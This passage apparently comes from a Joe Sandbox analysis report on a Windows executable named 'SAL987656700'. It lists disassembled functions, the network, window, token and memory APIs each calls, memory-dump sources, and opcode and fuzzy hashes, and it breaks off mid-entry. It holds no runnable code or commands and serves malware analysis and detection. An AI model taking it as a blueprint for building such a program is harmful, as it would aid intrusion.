                                      Function 008FCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,008FC21E,00000000), ref: 008FCF38
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 008FCF6F
                                      • GetLastError.KERNEL32(?,00000000,?,?,?,008FC21E,00000000), ref: 008FCFB4
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,008FC21E,00000000), ref: 008FCFC8
                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,008FC21E,00000000), ref: 008FCFF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 3191363074-0
                                      • Opcode ID: 9929c9fab76deac84fe6764cd9788f0c6d90d2b25610717f30775868691140e2
                                      • Instruction ID: 900c663bb1972c336c1d3e5656dd11c60f75cd93c26e5c7750787d7b4c8e5775
                                      • Opcode Fuzzy Hash: 9929c9fab76deac84fe6764cd9788f0c6d90d2b25610717f30775868691140e2
                                      • Instruction Fuzzy Hash: 00314BB160420DAFDB24DFA5C984ABABBF9FB14355B10842EF616D2141DB70AE41DB60
                                      Function 008E1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 008E1915
                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 008E19C1
                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 008E19C9
                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 008E19DA
                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 008E19E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: 292fca12b91aa65f59b0049bb96d1519056a2a2dba989d6fe6c51fe8b549fdc0
                                      • Instruction ID: 45d0c0b34c567b8bd6bf8745cef0366e945383adb5a0b30e6287bea2853052bf
                                      • Opcode Fuzzy Hash: 292fca12b91aa65f59b0049bb96d1519056a2a2dba989d6fe6c51fe8b549fdc0
                                      • Instruction Fuzzy Hash: E9319C71A14259EFCB00DFA9C99DAEE3BB5FB05315F108229F921EB2D2C7709944DB90
                                      Function 00915706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00915745
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0091579D
                                      • _wcslen.LIBCMT ref: 009157AF
                                      • _wcslen.LIBCMT ref: 009157BA
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00915816
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$_wcslen
                                      • String ID:
                                      • API String ID: 763830540-0
                                      • Opcode ID: 07acf8d69f10ec82ba2496874d4ea0faa4eda871a59daada13650bd0715bc11a
                                      • Instruction ID: 96331fd5c0b986bb3ccdea8bc9e9a5a070c2bf319b3a31df416e009c94bf07f6
                                      • Opcode Fuzzy Hash: 07acf8d69f10ec82ba2496874d4ea0faa4eda871a59daada13650bd0715bc11a
                                      • Instruction Fuzzy Hash: 0C21D570A0460CDADB209FA5CC85AEEBBBCFF84324F118616E919EA1D0D77089C5CF50
                                      Function 00900930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00900951
                                      • GetForegroundWindow.USER32 ref: 00900968
                                      • GetDC.USER32(00000000), ref: 009009A4
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 009009B0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 009009E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: f452cd44e0aa9757b8e2a3216e673f77929a4e45bb0f32d9aa53fde5385ebd7e
                                      • Instruction ID: 35568849f4ff13cc454039c7db53a81bc24f8f66171de0bdcfba27c87ef828c4
                                      • Opcode Fuzzy Hash: f452cd44e0aa9757b8e2a3216e673f77929a4e45bb0f32d9aa53fde5385ebd7e
                                      • Instruction Fuzzy Hash: B7218175700204AFD704EF69D888AAEBBE9FF85740F048468E95AD7362CB70AC04DB51
                                      Function 008BCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 008BCDC6
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008BCDE9
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008BCE0F
                                      • _free.LIBCMT ref: 008BCE22
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008BCE31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: e289301054742d89dcfe1cb8a4d94776f59d7aca2a8e49995c2590b9a923dd33
                                      • Instruction ID: 0f4e22be6a44e4f9cf05c00b39329792ba541314d88af4d8c4f921904f28302d
                                      • Opcode Fuzzy Hash: e289301054742d89dcfe1cb8a4d94776f59d7aca2a8e49995c2590b9a923dd33
                                      • Instruction Fuzzy Hash: 540184B2745215BF23211ABAAC88DFF6A6DFEC6BA13154129F905DB301EB61CD0291B1
                                      Function 0089990C Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 008998CC
                                      • SetTextColor.GDI32(?,?), ref: 008998D6
                                      • SetBkMode.GDI32(?,00000001), ref: 008998E9
                                      • GetStockObject.GDI32(00000005), ref: 008998F1
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00899952
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$LongModeObjectStockTextWindow
                                      • String ID:
                                      • API String ID: 1860813098-0
                                      • Opcode ID: 2d468330f59625a3f68542b7eed3dd75287bd3fe65c57addca784fa31609d3f1
                                      • Instruction ID: d34bec65ab3c22af99493874116a29ac0f96fc7d45d862eef8196ebed72b91b7
                                      • Opcode Fuzzy Hash: 2d468330f59625a3f68542b7eed3dd75287bd3fe65c57addca784fa31609d3f1
                                      • Instruction Fuzzy Hash: B721C4712492809FDB229F79EC58AE93FA0FB17331B0C429EE5E2CA1B1D7314941DB10
                                      Function 00899639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00899693
                                      • SelectObject.GDI32(?,00000000), ref: 008996A2
                                      • BeginPath.GDI32(?), ref: 008996B9
                                      • SelectObject.GDI32(?,00000000), ref: 008996E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 0df0707d4ee1d537f718e3145db5b67b9bd9e48822aaeea606679eb76968c0a9
                                      • Instruction ID: 8414245b335f5177d6e3fc4ef7e855be9bb981c044080a16cb4344e9c2817914
                                      • Opcode Fuzzy Hash: 0df0707d4ee1d537f718e3145db5b67b9bd9e48822aaeea606679eb76968c0a9
                                      • Instruction Fuzzy Hash: 4321B370929305EBDF12AF6AFC247E93B68FB21356F14421AF451D21B0D3705851EB90
                                      Function 008E5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 1ac09092bf7845fcd18092ba431739d1e14a1a75bd3ca9fa85b1e68a940e3ae4
                                      • Instruction ID: 7ef2306fe1ad2c0e7a9f609681b1d5beef4bb2fa362cbef7873201c78cb454f4
                                      • Opcode Fuzzy Hash: 1ac09092bf7845fcd18092ba431739d1e14a1a75bd3ca9fa85b1e68a940e3ae4
                                      • Instruction Fuzzy Hash: 370192A2745A4DFAEA0895169D92EFB635CFB6339CF004020FD08DA641F764ED6082E1
                                      Function 008B2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,008AF2DE,008B3863,00951444,?,0089FDF5,?,?,0088A976,00000010,00951440,008813FC,?,008813C6), ref: 008B2DFD
                                      • _free.LIBCMT ref: 008B2E32
                                      • _free.LIBCMT ref: 008B2E59
                                      • SetLastError.KERNEL32(00000000,00881129), ref: 008B2E66
                                      • SetLastError.KERNEL32(00000000,00881129), ref: 008B2E6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: edaf10d258f15e5cdb43128edfd4ebe46c83a397a5e27aef1b6a63f3786eb854
                                      • Instruction ID: b2095bce7c2cdffc122fea2f314120c7ffedae5b67445c51b8d8cb53d0278ac5
                                      • Opcode Fuzzy Hash: edaf10d258f15e5cdb43128edfd4ebe46c83a397a5e27aef1b6a63f3786eb854
                                      • Instruction Fuzzy Hash: 200128762896007BC613673A6C46DEB2A6DFBC53B6B204428F835E23D3EF34CC065121
                                      Function 008E000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CLSIDFromProgID.COMBASE ref: 008E002B
                                      • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008E0046
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008DFF41,80070057,?,?), ref: 008E0054
                                      • CoTaskMemFree.COMBASE(00000000), ref: 008E0064
                                      • CLSIDFromString.COMBASE(?,?), ref: 008E0070
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: 56ae902700c9b1215ea5f80cec37d52fdc2ef9d2592ea21b550aed30c7e8b8cd
                                      • Instruction ID: c60188996b353cca8a4f698febaf4b25f3d7e4d1bc3a2e797e013caef28d64d9
                                      • Opcode Fuzzy Hash: 56ae902700c9b1215ea5f80cec37d52fdc2ef9d2592ea21b550aed30c7e8b8cd
                                      • Instruction Fuzzy Hash: 6601DBB2710604BFDB119F6AEC44BAA7AADFB44392F148424FC01D2210E7B0CD80EBA0
                                      Function 008EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 008EE997
                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 008EE9A5
                                      • Sleep.KERNEL32(00000000), ref: 008EE9AD
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 008EE9B7
                                      • Sleep.KERNEL32 ref: 008EE9F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 6bfdb76177a11d46d590ec428afa0e2861bdc8dcd933a8ede590353e652178e3
                                      • Instruction ID: 12962bf8aefc5d0c7a6bad86e2fc3a67bf77021b9c824b743aba9a347ce41cb3
                                      • Opcode Fuzzy Hash: 6bfdb76177a11d46d590ec428afa0e2861bdc8dcd933a8ede590353e652178e3
                                      • Instruction Fuzzy Hash: E0015771D4962DEBCF00ABE6D849AEDBBB8FB0A300F004546E502F2242CB309550DBA1
                                      Function 008E10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E1114
                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E1120
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E112F
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E1136
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E114D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 883493501-0
                                      • Opcode ID: 01cb1f782e2c8bc561d92caaf33b4f1b7579b61c04a7ef8081706e58cd692527
                                      • Instruction ID: 05ae58587b1f3892233058a1b4dd468b9a17aacfd3270e5ee859c04811714680
                                      • Opcode Fuzzy Hash: 01cb1f782e2c8bc561d92caaf33b4f1b7579b61c04a7ef8081706e58cd692527
                                      • Instruction Fuzzy Hash: 15011DB9254305BFDF114F65DC4DAAA3B6EFF86360B104415FA45D7350DA71DC10DA60
                                      Function 008E0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E0FCA
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E0FD6
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E0FE5
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008E0FEC
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E1002
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      • Opcode ID: ee9be68e9f1da497d79d4357029b968ea965b969e1839b9685164aa5f99cdea5
                                      • Instruction ID: c48741309444fed7537d2de6868ed0a334afa677db1f898cac28567153684329
                                      • Opcode Fuzzy Hash: ee9be68e9f1da497d79d4357029b968ea965b969e1839b9685164aa5f99cdea5
                                      • Instruction Fuzzy Hash: 59F0AF79284301BBDB210FA59C4DF963B6EFF8A761F518414F905C6290CA30DC40DA60
                                      Function 008E1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008E102A
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008E1036
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1045
                                      • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008E104C
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008E1062
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                      • String ID:
                                      • API String ID: 47921759-0
                                      • Opcode ID: 4ed47c654f51da3aea53cbadcd28507a09d6119c4f28e71af74fafd5c30ff2f1
                                      • Instruction ID: 2eba6c99b093d26468d6847e08c90dd9469685e713b3a63b0608c10d961d67e9
                                      • Opcode Fuzzy Hash: 4ed47c654f51da3aea53cbadcd28507a09d6119c4f28e71af74fafd5c30ff2f1
                                      • Instruction Fuzzy Hash: 9CF0CDB9284301FBDB215FA5EC4CF963BAEFF8A761F114424FA05C7250CA30D840DA60
                                      Function 008F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
